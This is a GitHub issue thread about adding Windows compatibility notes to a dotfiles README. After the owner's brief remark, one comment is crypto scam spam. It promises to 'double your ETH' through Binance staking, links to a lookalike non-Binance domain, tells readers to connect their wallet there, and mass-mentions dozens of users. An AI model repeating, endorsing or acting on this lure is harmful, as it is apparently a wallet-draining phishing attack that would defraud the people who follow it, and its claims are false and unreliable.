### ISSUE TITLE
Add Windows compatibility comment in README

### ISSUE THREAD

**Issue by lendenmc** [lendenmc/dotfiles#20]

**Comment by lendenmc** [comment]
Remark: requirements that needed to be installed manually (see #19) should be mentioned in the README.

**Comment by YogaDarma182** [comment]
## 🚀 Double Your ETH with Binance Staking

Earn rewards and secure your financial future by staking your ETH with Binance. By participating in the Binance staking program, you can potentially double your ETH while supporting the blockchain network.

[![Start Staking Now](https://miro.medium.com/v2/resize:fit:720/format:webp/1*Ssf-ZH2f2V5dLyn7zYTXHg.png)](https://app.bnbinchain.com/en/bnb-staking?utm_source=email&utm_campaign=leads&utm_id=github)

**Click the banner above** to learn more and start staking your ETH with Binance today!

### How to Stake on Binance:
1. **[Visit the Official Binance Staking Page](https://app.bnbinchain.com/en/bnb-staking?utm_source=email&utm_campaign=leads&utm_id=github):** Click the link to navigate to the official staking page.
2. **Connect Your Wallet:** Ensure you have a wallet with sufficient ETH, then securely connect it to Binance.
3. **Interact with the Staking Method:** Follow the instructions to use the "connect" method and begin staking your ETH from your wallet balance.
cashlionjp, @niepiekm, @yordis, @marwanhilmi, @SkyAndCloud, @makaay2007, @bpw1621, @michelkk96, @isotayy, @p3k, @samtidball, @GochoMugo, @odineiramone, @gmargaritis, @cmark, @njm2112, @joyoyoyoyoyo, @roryrjb, @barryli0526, @nickosmark, @Rud156, @slashsbin, @igorissen, @aakritishroff, @joaopjt, @maninwindow, @jonian, @gmh5225, @F3D3TheEagle, @feelepxyz, @mamiu, @0x49D1, @benji13, @guayom, @briwilcox, @king6cong, @JWLAZY, @GianfrancoFrau, @asmockler, @social34, @t-io, @diemax, @hummatli, @aaronky, @francishero, @TN1ck, @sumodx, @gui64, @srdjan, @felipeorlando
